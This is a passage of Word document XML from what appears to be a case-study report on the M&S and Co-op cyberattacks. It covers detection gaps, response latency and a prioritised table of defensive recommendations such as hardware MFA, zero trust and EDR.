          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7A5ECF" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Absence of real-time anomaly detection for unusual authentication patterns (e.g., credential resets followed by immediate privileged access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679421F5" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Insufficient correlation between identity events (helpdesk tickets, MFA requests) and network activity (lateral movement, scanning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E7B076" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Lack of Indicators of Compromise (IoC) sharing with the NCSC or sector peers that might have enabled earlier detection based on Scattered Spider's documented patterns from prior incidents [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B696D65" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06967CF5" w14:textId="50806EBD" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.2 Response Effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56447E7F" w14:textId="6A252831" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Once detected, both organisations engaged third-party incident response capabilities and took affected systems offline. While these responses were appropriate, the latency between initial compromise and containment is the critical failure metric. Cichonski et al. [20] (NIST SP 800-61r2) identify the mean time to contain (MTTC) as the primary determinant of breach </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>impact  a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> finding that aligns with M&amp;S's reported £300m loss figure [2], which reflects the business cost of delayed containment rather than the intrusion itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB5B085" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0141A4C1" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>A notable comparative observation concerns the Co-op's apparently swifter containment, which may reflect participation in the NCSC's Cyber Information Sharing Partnership (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>CiSP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) [3], which facilitates real-time threat intelligence exchange between UK critical sectors. This hypothesis — if confirmed — would provide empirical support for the value of sector-level intelligence sharing as a detection accelerator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5A29B3" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73FE8A99" w14:textId="11DC9311" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Strategic Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717FB55" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The following recommendations are prioritised by risk reduction potential and grounded in established frameworks including NCSC Cyber Essentials [3], NIST SP 800-207 (ZTA) [9], and CISA guidance [6]. They directly address the root-cause failures identified in Section 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E11A726" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46462A48" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Table 2 — Strategic Recommendations: Prioritised Security Improvements</w:t>
      </w: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800"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="5BBA9832" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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0CD0DEF5" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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44060577" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Rationale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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360C835E" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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19187E86" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Est. Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="762DF57F"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06D94E0" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Deploy FIDO2 / Hardware MFA</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6F51FA1" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Eliminates MFA fatigue attacks entirely; push-based MFA is demonstrably insufficient per CISA guidance [6]</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4CB3D8E" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Critical</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40530CD" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="19047845"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C2FFED9" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Zero Trust Architecture (ZTA)</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50B275" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Removes implicit trust; limits lateral movement by requiring continuous verification per NIST SP 800-207 [9]</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DB145D" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">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1A8EFCE" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="7A449F65"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B86BF03" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Privileged Access Workstations (PAWs)</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B5ACF06" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Isolates privileged activity, reducing risk of credential theft from standard endpoints</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5C4F976" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">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30A30D5E" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="67735F9B"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A3D423" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SIEM / UEBA Enhancement</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0E12A9" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Behavioural analytics can detect anomalous login patterns indicative of credential misuse before impact occurs [3]</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EED654" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">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A134CC" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="777A0C6A"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027B3EB" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Endpoint Detection &amp; Response (EDR)</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E2E2CD1" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Real-time telemetry enables detection of living-off-the-land techniques (T1059) missed by signature AV</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6C7A1DB9" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">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3D32D35" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="749F0931"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3B2743" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Network Micro-Segmentation</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5DE66C" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Constrains lateral movement; a compromise in one segment cannot propagate freely [9]</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5D6FBC" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</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946978" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="34E31E9D"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4308C86" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mandatory Security Awareness Training</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58B9D90" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Reduces susceptibility to vishing; employees represent the first and most frequently exploited attack surface [4]</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78286F95" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</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24D91E7" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="2FC3C605"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1A42C2" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tabletop Incident Response Exercises</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7FB828" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Improves response speed; both M&amp;S and Co-op experienced delayed detection highlighting the need for rehearsed playbooks</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8C8D2C4" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</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4A62F9" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04908650" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sources: NCSC [3], CISA [6], NIST SP 800-207 [9], Grassi et al. [14]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D4C08" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CDAA5BF" w14:textId="4146E93E" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
